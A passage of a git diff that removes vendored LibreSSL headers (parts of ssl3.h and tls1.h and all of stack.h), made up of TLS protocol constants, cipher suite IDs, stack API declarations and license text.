-#define SSL3_ST_CW_FINISHED_A			(0x1B0|SSL_ST_CONNECT)
-#define SSL3_ST_CW_FINISHED_B			(0x1B1|SSL_ST_CONNECT)
-/* read from server */
-#define SSL3_ST_CR_CHANGE_A			(0x1C0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CHANGE_B			(0x1C1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_FINISHED_A			(0x1D0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_FINISHED_B			(0x1D1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SESSION_TICKET_A		(0x1E0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SESSION_TICKET_B		(0x1E1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_STATUS_A		(0x1F0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_STATUS_B		(0x1F1|SSL_ST_CONNECT)
-
-/* server */
-/* extra state */
-#define SSL3_ST_SW_FLUSH			(0x100|SSL_ST_ACCEPT)
-/* read from client */
-/* Do not change the number values, they do matter */
-#define SSL3_ST_SR_CLNT_HELLO_A			(0x110|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CLNT_HELLO_B			(0x111|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CLNT_HELLO_C			(0x112|SSL_ST_ACCEPT)
-/* write to client */
-#define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A	(0x113|SSL_ST_ACCEPT)
-#define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B	(0x114|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_A			(0x120|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_B			(0x121|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_C			(0x122|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_HELLO_A			(0x130|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_HELLO_B			(0x131|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_A			(0x140|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_B			(0x141|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_KEY_EXCH_A			(0x150|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_KEY_EXCH_B			(0x151|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_REQ_A			(0x160|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_REQ_B			(0x161|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_DONE_A			(0x170|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_DONE_B			(0x171|SSL_ST_ACCEPT)
-/* read from client */
-#define SSL3_ST_SR_CERT_A			(0x180|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_B			(0x181|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_KEY_EXCH_A			(0x190|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_KEY_EXCH_B			(0x191|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_VRFY_A			(0x1A0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_VRFY_B			(0x1A1|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CHANGE_A			(0x1B0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CHANGE_B			(0x1B1|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_FINISHED_A			(0x1C0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_FINISHED_B			(0x1C1|SSL_ST_ACCEPT)
-/* write to client */
-#define SSL3_ST_SW_CHANGE_A			(0x1D0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CHANGE_B			(0x1D1|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_FINISHED_A			(0x1E0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_FINISHED_B			(0x1E1|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SESSION_TICKET_A		(0x1F0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SESSION_TICKET_B		(0x1F1|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_STATUS_A		(0x200|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_STATUS_B		(0x201|SSL_ST_ACCEPT)
-
-#define SSL3_MT_HELLO_REQUEST			0
-#define SSL3_MT_CLIENT_HELLO			1
-#define SSL3_MT_SERVER_HELLO			2
-#define	SSL3_MT_NEWSESSION_TICKET		4
-#define SSL3_MT_CERTIFICATE			11
-#define SSL3_MT_SERVER_KEY_EXCHANGE		12
-#define SSL3_MT_CERTIFICATE_REQUEST		13
-#define SSL3_MT_SERVER_DONE			14
-#define SSL3_MT_CERTIFICATE_VERIFY		15
-#define SSL3_MT_CLIENT_KEY_EXCHANGE		16
-#define SSL3_MT_FINISHED			20
-#define SSL3_MT_CERTIFICATE_STATUS		22
-
-#define DTLS1_MT_HELLO_VERIFY_REQUEST		3
-
-#define SSL3_MT_CCS				1
-
-/* These are used when changing over to a new cipher */
-#define SSL3_CC_READ		0x01
-#define SSL3_CC_WRITE		0x02
-#define SSL3_CC_CLIENT		0x10
-#define SSL3_CC_SERVER		0x20
-#define SSL3_CHANGE_CIPHER_CLIENT_WRITE		(SSL3_CC_CLIENT|SSL3_CC_WRITE)
-#define SSL3_CHANGE_CIPHER_SERVER_READ		(SSL3_CC_SERVER|SSL3_CC_READ)
-#define SSL3_CHANGE_CIPHER_CLIENT_READ		(SSL3_CC_CLIENT|SSL3_CC_READ)
-#define SSL3_CHANGE_CIPHER_SERVER_WRITE		(SSL3_CC_SERVER|SSL3_CC_WRITE)
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/stack.h b/thirdparty/libressl/include/openssl/stack.h
deleted file mode 100644
index 6bea634..0000000
--- a/thirdparty/libressl/include/openssl/stack.h
+++ /dev/null
@@ -1,107 +0,0 @@
-/* $OpenBSD: stack.h,v 1.9 2014/06/12 15:49:30 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_STACK_H
-#define HEADER_STACK_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct stack_st {
-	int num;
-	char **data;
-	int sorted;
-
-	int num_alloc;
-	int (*comp)(const void *, const void *);
-} _STACK;  /* Use STACK_OF(...) instead */
-
-#define M_sk_num(sk)		((sk) ? (sk)->num:-1)
-#define M_sk_value(sk,n)	((sk) ? (sk)->data[n] : NULL)
-
-int sk_num(const _STACK *);
-void *sk_value(const _STACK *, int);
-
-void *sk_set(_STACK *, int, void *);
-
-_STACK *sk_new(int (*cmp)(const void *, const void *));
-_STACK *sk_new_null(void);
-void sk_free(_STACK *);
-void sk_pop_free(_STACK *st, void (*func)(void *));
-int sk_insert(_STACK *sk, void *data, int where);
-void *sk_delete(_STACK *st, int loc);
-void *sk_delete_ptr(_STACK *st, void *p);
-int sk_find(_STACK *st, void *data);
-int sk_find_ex(_STACK *st, void *data);
-int sk_push(_STACK *st, void *data);
-int sk_unshift(_STACK *st, void *data);
-void *sk_shift(_STACK *st);
-void *sk_pop(_STACK *st);
-void sk_zero(_STACK *st);
-int (*sk_set_cmp_func(_STACK *sk, int (*c)(const void *, const void *)))(
-    const void *, const void *);
-_STACK *sk_dup(_STACK *st);
-void sk_sort(_STACK *st);
-int sk_is_sorted(const _STACK *st);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/tls1.h b/thirdparty/libressl/include/openssl/tls1.h
deleted file mode 100644
index 8e369c7..0000000
--- a/thirdparty/libressl/include/openssl/tls1.h
+++ /dev/null
@@ -1,746 +0,0 @@
-/* $OpenBSD: tls1.h,v 1.31 2017/08/28 17:36:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the OpenSSL open source
- * license provided above.
- *
- * ECC cipher suite support in OpenSSL originally written by
- * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
- *
- */
-/* ====================================================================
- * Copyright 2005 Nokia. All rights reserved.
- *
- * The portions of the attached software ("Contribution") is developed by
- * Nokia Corporation and is licensed pursuant to the OpenSSL open source
- * license.
- *
- * The Contribution, originally written by Mika Kousa and Pasi Eronen of
- * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
- * support (see RFC 4279) to OpenSSL.
- *
- * No patent licenses or other rights except those expressly stated in
- * the OpenSSL open source license shall be deemed granted or received
- * expressly, by implication, estoppel, or otherwise.
- *
- * No assurances are provided by Nokia that the Contribution does not
- * infringe the patent or other intellectual property rights of any third
- * party or that the license provides you with all the necessary rights
- * to make use of the Contribution.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
- * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
- * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
- * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
- * OTHERWISE.
- */
-
-#ifndef HEADER_TLS1_H
-#define HEADER_TLS1_H
-
-#include <openssl/buffer.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES	0
-
-#define TLS1_2_VERSION			0x0303
-#define TLS1_2_VERSION_MAJOR		0x03
-#define TLS1_2_VERSION_MINOR		0x03
-
-#define TLS1_1_VERSION			0x0302
-#define TLS1_1_VERSION_MAJOR		0x03
-#define TLS1_1_VERSION_MINOR		0x02
-
-#define TLS1_VERSION			0x0301
-#define TLS1_VERSION_MAJOR		0x03
-#define TLS1_VERSION_MINOR		0x01
-
-#define TLS1_get_version(s) \
-		((s->version >> 8) == TLS1_VERSION_MAJOR ? s->version : 0)
-
-#define TLS1_get_client_version(s) \
-		((s->client_version >> 8) == TLS1_VERSION_MAJOR ? s->client_version : 0)
-
-/*
- * TLS Alert codes.
- *
- * https://www.iana.org/assignments/tls-parameters/#tls-parameters-6
- */
-
-#define TLS1_AD_DECRYPTION_FAILED		21
-#define TLS1_AD_RECORD_OVERFLOW			22
-#define TLS1_AD_UNKNOWN_CA			48	/* fatal */
-#define TLS1_AD_ACCESS_DENIED			49	/* fatal */
-#define TLS1_AD_DECODE_ERROR			50	/* fatal */
-#define TLS1_AD_DECRYPT_ERROR			51
-#define TLS1_AD_EXPORT_RESTRICTION		60	/* fatal */
-#define TLS1_AD_PROTOCOL_VERSION		70	/* fatal */
-#define TLS1_AD_INSUFFICIENT_SECURITY		71	/* fatal */
-#define TLS1_AD_INTERNAL_ERROR			80	/* fatal */
-/* Code 86 from RFC 7507. */
-#define TLS1_AD_INAPPROPRIATE_FALLBACK		86	/* fatal */
-#define TLS1_AD_USER_CANCELLED			90
-#define TLS1_AD_NO_RENEGOTIATION		100
-/* Codes 110-114 from RFC 3546. */
-#define TLS1_AD_UNSUPPORTED_EXTENSION		110
-#define TLS1_AD_CERTIFICATE_UNOBTAINABLE	111
-#define TLS1_AD_UNRECOGNIZED_NAME	 	112
-#define TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE	113
-#define TLS1_AD_BAD_CERTIFICATE_HASH_VALUE	114
-/* Code 115 from RFC 4279. */
-#define TLS1_AD_UNKNOWN_PSK_IDENTITY		115	/* fatal */
-
-/*
- * TLS ExtensionType values.
- *
- * https://www.iana.org/assignments/tls-extensiontype-values/
- */
-
-/* ExtensionType values from RFC 3546, RFC 4366 and RFC 6066. */
-#define TLSEXT_TYPE_server_name			0
-#define TLSEXT_TYPE_max_fragment_length		1
-#define TLSEXT_TYPE_client_certificate_url	2
-#define TLSEXT_TYPE_trusted_ca_keys		3
-#define TLSEXT_TYPE_truncated_hmac		4
-#define TLSEXT_TYPE_status_request		5
-
-/* ExtensionType values from RFC 4681. */
-#define TLSEXT_TYPE_user_mapping		6
-
-/* ExtensionType values from RFC 5878. */
-#define TLSEXT_TYPE_client_authz		7
-#define TLSEXT_TYPE_server_authz		8
-
-/* ExtensionType values from RFC 6091. */
-#define TLSEXT_TYPE_cert_type		9
-
-/* ExtensionType values from RFC 4492. */
-#define TLSEXT_TYPE_elliptic_curves		10
-#define TLSEXT_TYPE_ec_point_formats		11
-
-/* ExtensionType value from RFC 5054. */
-#define TLSEXT_TYPE_srp				12
-
-/* ExtensionType values from RFC 5246. */
-#define TLSEXT_TYPE_signature_algorithms	13
-
-/* ExtensionType value from RFC 5764. */
-#define TLSEXT_TYPE_use_srtp	14
-
-/* ExtensionType value from RFC 5620. */
-#define TLSEXT_TYPE_heartbeat	15
-
-/* ExtensionType value from RFC 7301. */
-#define TLSEXT_TYPE_application_layer_protocol_negotiation 16
-
-/* ExtensionType value from RFC 7685. */
-#define TLSEXT_TYPE_padding	21
-
-/* ExtensionType value from RFC 4507. */
-#define TLSEXT_TYPE_session_ticket		35
-
-/* Temporary extension type */
-#define TLSEXT_TYPE_renegotiate                 0xff01
-
-/* NameType value from RFC 3546. */
-#define TLSEXT_NAMETYPE_host_name 0
-/* status request value from RFC 3546 */
-#define TLSEXT_STATUSTYPE_ocsp 1
-
-/* ECPointFormat values from RFC 4492. */
-#define TLSEXT_ECPOINTFORMAT_first			0
-#define TLSEXT_ECPOINTFORMAT_uncompressed		0
-#define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime	1
-#define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2	2
-#define TLSEXT_ECPOINTFORMAT_last			2
-
-/* Signature and hash algorithms from RFC 5246. */
-
-#define TLSEXT_signature_anonymous			0
-#define TLSEXT_signature_rsa				1
-#define TLSEXT_signature_dsa				2
-#define TLSEXT_signature_ecdsa				3
-/* FIXME IANA */
-#define TLSEXT_signature_gostr01			237
-#define TLSEXT_signature_gostr12_256			238
-#define TLSEXT_signature_gostr12_512			239
-
-#define TLSEXT_hash_none				0
-#define TLSEXT_hash_md5					1
-#define TLSEXT_hash_sha1				2
-#define TLSEXT_hash_sha224				3
-#define TLSEXT_hash_sha256				4
-#define TLSEXT_hash_sha384				5
-#define TLSEXT_hash_sha512				6
-/* FIXME IANA */
-#define TLSEXT_hash_gost94				237
-#define TLSEXT_hash_streebog_256			238
-#define TLSEXT_hash_streebog_512			239
-
-#define TLSEXT_MAXLEN_host_name 255
-
-const char *SSL_get_servername(const SSL *s, const int type);
-int SSL_get_servername_type(const SSL *s);
-/* SSL_export_keying_material exports a value derived from the master secret,
- * as specified in RFC 5705. It writes |olen| bytes to |out| given a label and
- * optional context. (Since a zero length context is allowed, the |use_context|
- * flag controls whether a context is included.)
- *
- * It returns 1 on success and zero otherwise.
- */
-int SSL_export_keying_material(SSL *s, unsigned char *out, size_t olen,
-    const char *label, size_t llen, const unsigned char *p, size_t plen,
-    int use_context);
-
-#define SSL_set_tlsext_host_name(s,name) \
-SSL_ctrl(s,SSL_CTRL_SET_TLSEXT_HOSTNAME,TLSEXT_NAMETYPE_host_name,(char *)name)
-
-#define SSL_set_tlsext_debug_callback(ssl, cb) \
-SSL_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_CB,(void (*)(void))cb)
-
-#define SSL_set_tlsext_debug_arg(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_ARG,0, (void *)arg)
-
-#define SSL_set_tlsext_status_type(ssl, type) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE,type, NULL)
-
-#define SSL_get_tlsext_status_exts(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
-
-#define SSL_set_tlsext_status_exts(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
-
-#define SSL_get_tlsext_status_ids(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
-
-#define SSL_set_tlsext_status_ids(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
-
-#define SSL_get_tlsext_status_ocsp_resp(ssl, arg) \
-SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP,0, (void *)arg)
-
-#define SSL_set_tlsext_status_ocsp_resp(ssl, arg, arglen) \
-SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP,arglen, (void *)arg)
-
-#define SSL_CTX_set_tlsext_servername_callback(ctx, cb) \
-SSL_CTX_callback_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_CB,(void (*)(void))cb)
-
-#define SSL_TLSEXT_ERR_OK 0
-#define SSL_TLSEXT_ERR_ALERT_WARNING 1
-#define SSL_TLSEXT_ERR_ALERT_FATAL 2
-#define SSL_TLSEXT_ERR_NOACK 3
-
-#define SSL_CTX_set_tlsext_servername_arg(ctx, arg) \
-SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG,0, (void *)arg)
-
-#define SSL_CTX_get_tlsext_ticket_keys(ctx, keys, keylen) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_GET_TLSEXT_TICKET_KEYS,(keylen),(keys))
-#define SSL_CTX_set_tlsext_ticket_keys(ctx, keys, keylen) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_SET_TLSEXT_TICKET_KEYS,(keylen),(keys))
-
-#define SSL_CTX_set_tlsext_status_cb(ssl, cb) \
-SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB,(void (*)(void))cb)
-
-#define SSL_CTX_set_tlsext_status_arg(ssl, arg) \
-SSL_CTX_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG,0, (void *)arg)
-
-#define SSL_CTX_set_tlsext_ticket_key_cb(ssl, cb) \
-SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB,(void (*)(void))cb)
-
-/* PSK ciphersuites from RFC 4279. */
-#define TLS1_CK_PSK_WITH_RC4_128_SHA                    0x0300008A
-#define TLS1_CK_PSK_WITH_3DES_EDE_CBC_SHA               0x0300008B
-#define TLS1_CK_PSK_WITH_AES_128_CBC_SHA                0x0300008C
-#define TLS1_CK_PSK_WITH_AES_256_CBC_SHA                0x0300008D
-
-/* Additional TLS ciphersuites from expired Internet Draft
- * draft-ietf-tls-56-bit-ciphersuites-01.txt
- * (available if TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES is defined, see
- * s3_lib.c).  We actually treat them like SSL 3.0 ciphers, which we probably
- * shouldn't.  Note that the first two are actually not in the IDs. */
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_MD5		0x03000060 /* not in ID */
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5	0x03000061 /* not in ID */
-#define TLS1_CK_RSA_EXPORT1024_WITH_DES_CBC_SHA		0x03000062
-#define TLS1_CK_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA	0x03000063
-#define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_SHA		0x03000064
-#define TLS1_CK_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA	0x03000065
-#define TLS1_CK_DHE_DSS_WITH_RC4_128_SHA		0x03000066
-
-/* AES ciphersuites from RFC 3268. */
-
-#define TLS1_CK_RSA_WITH_AES_128_SHA			0x0300002F
-#define TLS1_CK_DH_DSS_WITH_AES_128_SHA			0x03000030
-#define TLS1_CK_DH_RSA_WITH_AES_128_SHA			0x03000031
-#define TLS1_CK_DHE_DSS_WITH_AES_128_SHA		0x03000032
-#define TLS1_CK_DHE_RSA_WITH_AES_128_SHA		0x03000033
-#define TLS1_CK_ADH_WITH_AES_128_SHA			0x03000034
-
-#define TLS1_CK_RSA_WITH_AES_256_SHA			0x03000035
-#define TLS1_CK_DH_DSS_WITH_AES_256_SHA			0x03000036
-#define TLS1_CK_DH_RSA_WITH_AES_256_SHA			0x03000037
-#define TLS1_CK_DHE_DSS_WITH_AES_256_SHA		0x03000038
-#define TLS1_CK_DHE_RSA_WITH_AES_256_SHA		0x03000039
-#define TLS1_CK_ADH_WITH_AES_256_SHA			0x0300003A
-
-/* TLS v1.2 ciphersuites */
-#define TLS1_CK_RSA_WITH_NULL_SHA256			0x0300003B
-#define TLS1_CK_RSA_WITH_AES_128_SHA256			0x0300003C
-#define TLS1_CK_RSA_WITH_AES_256_SHA256			0x0300003D
-#define TLS1_CK_DH_DSS_WITH_AES_128_SHA256		0x0300003E
-#define TLS1_CK_DH_RSA_WITH_AES_128_SHA256		0x0300003F
-#define TLS1_CK_DHE_DSS_WITH_AES_128_SHA256		0x03000040
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA		0x03000041
-#define TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA	0x03000042
-#define TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA	0x03000043
-#define TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA	0x03000044
-#define TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA	0x03000045
-#define TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA		0x03000046
-
-/* TLS v1.2 ciphersuites */
-#define TLS1_CK_DHE_RSA_WITH_AES_128_SHA256		0x03000067
-#define TLS1_CK_DH_DSS_WITH_AES_256_SHA256		0x03000068
